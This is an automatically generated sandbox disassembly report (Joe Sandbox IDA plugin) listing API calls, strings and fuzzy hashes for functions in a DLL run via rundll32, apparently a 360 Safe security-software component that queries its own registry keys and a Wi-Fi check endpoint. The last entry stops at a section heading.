Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
API String ID: 1620117007-629564897
Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E07C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 163filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000E0E1
GetFileSizeEx.KERNEL32 ref: 000000018000E0FB
malloc.MSVCRT ref: 000000018000E127
memset.MSVCRT ref: 000000018000E142
ReadFile.KERNEL32 ref: 000000018000E15C

Part of subcall function 000000018000DDA4: EnterCriticalSection.KERNEL32 ref: 000000018000DDEB
Part of subcall function 000000018000DDA4: LeaveCriticalSection.KERNEL32 ref: 000000018000DE34

malloc.MSVCRT ref: 000000018000E22B
memset.MSVCRT ref: 000000018000E247

Part of subcall function 000000018000DC14: EnterCriticalSection.KERNEL32 ref: 000000018000DC5D
Part of subcall function 000000018000DC14: LeaveCriticalSection.KERNEL32 ref: 000000018000DCA6

GetFileTime.KERNEL32 ref: 000000018000E281
CloseHandle.KERNEL32 ref: 000000018000E28F
free.MSVCRT ref: 000000018000E29C
free.MSVCRT ref: 000000018000E2AF

Strings

|, xrefs: 000000018000E18C
D063, xrefs: 000000018000E176

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
String ID: D063$|
API String ID: 1613485820-3743183194
Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056C84 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 93COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180056CB4
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D05

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

memset.MSVCRT ref: 0000000180056D30
memset.MSVCRT ref: 0000000180056D5A
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D9C

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

LeaveCriticalSection.KERNEL32(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056DCF

Strings

SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056D46
SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056CF4
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056D80
Partner, xrefs: 0000000180056D6E
SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056D77
pid, xrefs: 0000000180056CED
PartnerName, xrefs: 0000000180056D3F

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
API String ID: 264253324-3445957450
Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004808C Relevance: 21.3, APIs: 7, Strings: 5, Instructions: 252COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800480D3

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

GetTickCount.KERNEL32 ref: 000000018004825D
srand.MSVCRT ref: 0000000180048265
rand.MSVCRT ref: 000000018004826B
rand.MSVCRT ref: 000000018004829C

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B026

Part of subcall function 000000018000AF68: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000B04B

InitializeCriticalSection.KERNEL32(?,?,?,?,?,?,?,000000018000644F), ref: 0000000180048390
??3@YAXPEAX@Z.MSVCRT ref: 0000000180048415

Strings

http://%s/wcheckquery, xrefs: 00000001800482EE, 0000000180048331
wificheck, xrefs: 00000001800481F4
360safe, xrefs: 00000001800481D5
WifiCheckQuery, xrefs: 0000000180048237
wificheck:1, xrefs: 0000000180048215

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
API String ID: 2719022499-1298750920
Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066608 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066653
RegQueryValueExW.ADVAPI32 ref: 0000000180066696
RegCloseKey.ADVAPI32 ref: 00000001800666AA

Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 00000001800664D7
Part of subcall function 0000000180066428: RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
Part of subcall function 0000000180066428: memset.MSVCRT ref: 0000000180066519
Part of subcall function 0000000180066428: RegQueryValueExW.ADVAPI32 ref: 0000000180066556
Part of subcall function 0000000180066428: RegCloseKey.ADVAPI32 ref: 000000018006656C
Part of subcall function 0000000180066428: PathAppendW.SHLWAPI ref: 000000018006657E
Part of subcall function 0000000180066428: PathFileExistsW.SHLWAPI ref: 0000000180066589
Part of subcall function 0000000180066428: GetProcAddress.KERNEL32 ref: 00000001800665AF
Part of subcall function 0000000180066428: FreeLibrary.KERNEL32 ref: 00000001800665C3

RegCloseKey.ADVAPI32 ref: 00000001800666E1
GetCurrentProcess.KERNEL32 ref: 0000000180066715
OpenProcessToken.ADVAPI32 ref: 0000000180066727
CloseHandle.KERNEL32 ref: 0000000180066748
GetCommandLineW.KERNEL32 ref: 000000018006675D
wcsstr.MSVCRT ref: 000000018006678D

Strings

SOFTWARE\360Safe\360Ent, xrefs: 0000000180066645
/elevated, xrefs: 0000000180066786
ServiceCall, xrefs: 000000018006668B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
API String ID: 3868077243-983453937
Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180002308 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 102libraryloaderCOMMON

Download Yara Rule

APIs

SHGetMalloc.SHELL32 ref: 0000000180002336
SHGetSpecialFolderLocation.SHELL32 ref: 000000018000234D

Part of subcall function 0000000180001900: SHGetPathFromIDListW.SHELL32 ref: 000000018000190C

GetModuleHandleW.KERNEL32 ref: 000000018000239C
GetProcAddress.KERNEL32 ref: 00000001800023B5
GetCurrentProcess.KERNEL32 ref: 00000001800023C7
wcsstr.MSVCRT ref: 0000000180002407

Strings

\System32, xrefs: 0000000180002415
\SysWOW64, xrefs: 00000001800023FD
Kernel32.dll, xrefs: 0000000180002395
(x86), xrefs: 0000000180002437
IsWow64Process, xrefs: 00000001800023AB

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
API String ID: 3215350457-2087702655
Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006D6CC Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 100memorysynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 000000018006D70D

Part of subcall function 000000018006DE8C: _vsnwprintf.LEGACY_STDIO_DEFINITIONS ref: 000000018006DECC

CreateMutexW.KERNEL32 ref: 000000018006D74A
GetLastError.KERNEL32 ref: 000000018006D761
WaitForSingleObject.KERNEL32 ref: 000000018006D774
ReleaseMutex.KERNEL32 ref: 000000018006D794
CloseHandle.KERNEL32 ref: 000000018006D7A1
GetProcessHeap.KERNEL32 ref: 000000018006D7AC
HeapAlloc.KERNEL32 ref: 000000018006D7C2
_CxxThrowException.MSVCRT ref: 000000018006D846
_CxxThrowException.MSVCRT ref: 000000018006D85F

Strings

%s %u, xrefs: 000000018006D71E
1830B7BD-F7A3-4c4d-989B-C004DE465EDE, xrefs: 000000018006D717

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ExceptionHeapMutexProcessThrow$AllocCloseCreateCurrentErrorHandleLastObjectReleaseSingleWait_vsnwprintf
String ID: %s %u$1830B7BD-F7A3-4c4d-989B-C004DE465EDE
API String ID: 2737990526-332789905
Opcode ID: a6631fe1c16800c7b956d60b41329a92483b8374a7c1be76f7774319ef1e7a52
Instruction ID: a9baedbc029666fcfb797ea24b2c3707e7ddbe0d9b167d2682321881bda92835
Opcode Fuzzy Hash: a6631fe1c16800c7b956d60b41329a92483b8374a7c1be76f7774319ef1e7a52
Instruction Fuzzy Hash: 4C417131A09B4D81EAA69F11E8183D973A1FB8CBD0F558126F96D57B95DF38C709C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800448C4 Relevance: 19.8, APIs: 13, Instructions: 310memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044908
GetTickCount.KERNEL32 ref: 00000001800449C4
srand.MSVCRT ref: 00000001800449CC
rand.MSVCRT ref: 00000001800449D2
LeaveCriticalSection.KERNEL32 ref: 0000000180044A6F
EnterCriticalSection.KERNEL32 ref: 0000000180044AE0
SysAllocString.OLEAUT32 ref: 0000000180044BF7
SysStringByteLen.OLEAUT32 ref: 0000000180044C0C
SysAllocStringByteLen.OLEAUT32 ref: 0000000180044C17
SysFreeString.OLEAUT32 ref: 0000000180044C26
LeaveCriticalSection.KERNEL32 ref: 0000000180044C63
EnterCriticalSection.KERNEL32 ref: 0000000180044CBE
LeaveCriticalSection.KERNEL32 ref: 0000000180044CD1

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
String ID:
API String ID: 2388112003-0
Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001D0C0 Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 268COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001D157
MultiByteToWideChar.KERNEL32(?,?,?,?,?,000000018001CF99), ref: 000000018001D21B
StrCpyNW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D235
StrCmpNIW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D259
StrCmpNIW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D277
SHGetDesktopFolder.SHELL32(?,?,?,?,?,000000018001CF99), ref: 000000018001D3CC
StrRetToBufW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D436
StrCmpNIW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D468
StrCmpNIW.SHLWAPI(?,?,?,?,?,000000018001CF99), ref: 000000018001D486

Strings

http://, xrefs: 000000018001D24B, 000000018001D45A
https://, xrefs: 000000018001D269, 000000018001D478

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ByteCharDesktopFolderMultiWidememset
String ID: http://$https://
API String ID: 1422489264-1916535328
Opcode ID: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
Instruction ID: c30af850ed793d6246f4afeb4f6cdbd0e11f44053fb96dbf7aad71616760a46c
Opcode Fuzzy Hash: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
Instruction Fuzzy Hash: E0D17C72610A8C92FBA2DF25D8807D977A1F759BE4F44C212EA69476E4DF78C788C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180049798 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221memorycomserviceCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00000001800497D2
CoCreateInstance.OLE32 ref: 0000000180049805
IUnknown_QueryService.SHLWAPI ref: 0000000180049897
VariantClear.OLEAUT32 ref: 0000000180049977
SysAllocString.OLEAUT32 ref: 0000000180049992
SysFreeString.OLEAUT32 ref: 0000000180049A40
VariantClear.OLEAUT32 ref: 0000000180049A4B
VariantClear.OLEAUT32 ref: 0000000180049A5E
CoUninitialize.OLE32 ref: 0000000180049A85
SysAllocString.OLEAUT32 ref: 0000000180049AA7

Strings

open, xrefs: 000000018004998B

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: ClearStringVariant$Alloc$CreateFreeInitializeInstanceQueryServiceUninitializeUnknown_
String ID: open
API String ID: 3369762758-2758837156
Opcode ID: a43523610611c378cca31248403e0302d52fa255af9d6838623d0ca3cc09ea2b
Instruction ID: 016acdd877b6e015137f5ee96552d188512c5d8580b2209aebf3e24041668436
Opcode Fuzzy Hash: a43523610611c378cca31248403e0302d52fa255af9d6838623d0ca3cc09ea2b
Instruction Fuzzy Hash: 29A14C32605F8886EB51CFA8E8803DD77B0FB89B98F158125EA5D57B68DF38C658C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007338 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 189COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00000001800073B2
InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00000001800073C2
GetLastError.KERNEL32 ref: 00000001800073CC
GetModuleFileNameW.KERNEL32 ref: 000000018000744E
GetModuleHandleW.KERNEL32 ref: 00000001800074BE
memmove.MSVCRT ref: 000000018000751E
_errno.MSVCRT ref: 00000001800075C8

Strings

Module_Raw, xrefs: 000000018000757F
APPID, xrefs: 0000000180007417
REGISTRY, xrefs: 00000001800075F4, 0000000180007616
Module, xrefs: 0000000180007563

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: Module$CountCriticalErrorFileHandleInitializeLastNameSectionSpin_errnomemmovememset
String ID: APPID$Module$Module_Raw$REGISTRY
API String ID: 1381946311-2529269209
Opcode ID: 42df453a6e546fab6b26a4e5406ef9f516e10fb810bfab3826e8743d0129955c
Instruction ID: ca44b29825fa96490725d23854b63ecce677dfdd7fd5260595c701ae4d544977
Opcode Fuzzy Hash: 42df453a6e546fab6b26a4e5406ef9f516e10fb810bfab3826e8743d0129955c
Instruction Fuzzy Hash: B9818F72704B8995FBA2CF24D8403DA33A0F7A8794F509116EA4D47AA6EF7CC749C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018005B3A4 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 118COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018005B3ED
SHGetValueW.SHLWAPI ref: 000000018005B441
memset.MSVCRT ref: 000000018005B474
wcspbrk.MSVCRT ref: 000000018005B484
wcspbrk.MSVCRT ref: 000000018005B4A8
_wtoi.MSVCRT ref: 000000018005B4CC
_wtoi.MSVCRT ref: 000000018005B4DD
_wtoi.MSVCRT ref: 000000018005B4EB
_mktime64.MSVCRT ref: 000000018005B501

Strings

Coop, xrefs: 000000018005B404
registtime, xrefs: 000000018005B42E

Memory Dump Source

Source File: 00000003.00000002.2158286028.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.2158263563.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158340371.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158376910.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158395585.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000003.00000002.2158439813.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_rundll32.jbxd

Similarity

API ID: _wtoi$memsetwcspbrk$Value_mktime64
String ID: Coop$registtime
API String ID: 3119170779-49026069
Opcode ID: 17e78d961b3c98d2c9fd2b505412eb94f72169473390c647705ed6788460fd26
Instruction ID: a5f189bdc73645ebb566d298bb8c62f08fd14c06432b1dd069cc51e5f38a5063
Opcode Fuzzy Hash: 17e78d961b3c98d2c9fd2b505412eb94f72169473390c647705ed6788460fd26
Instruction Fuzzy Hash: 08517F32711A4486EB96CF24E4403D933A0F788BE4F459225FA6E53BE4DF39C649C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180060B20 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 113libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F

OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
SysFreeString.OLEAUT32 ref: 0000000180060C89

Strings

QueryFullProcessImageNameW, xrefs: 0000000180060C28
Kernel32.dll, xrefs: 0000000180060C18

Memory Dump Source

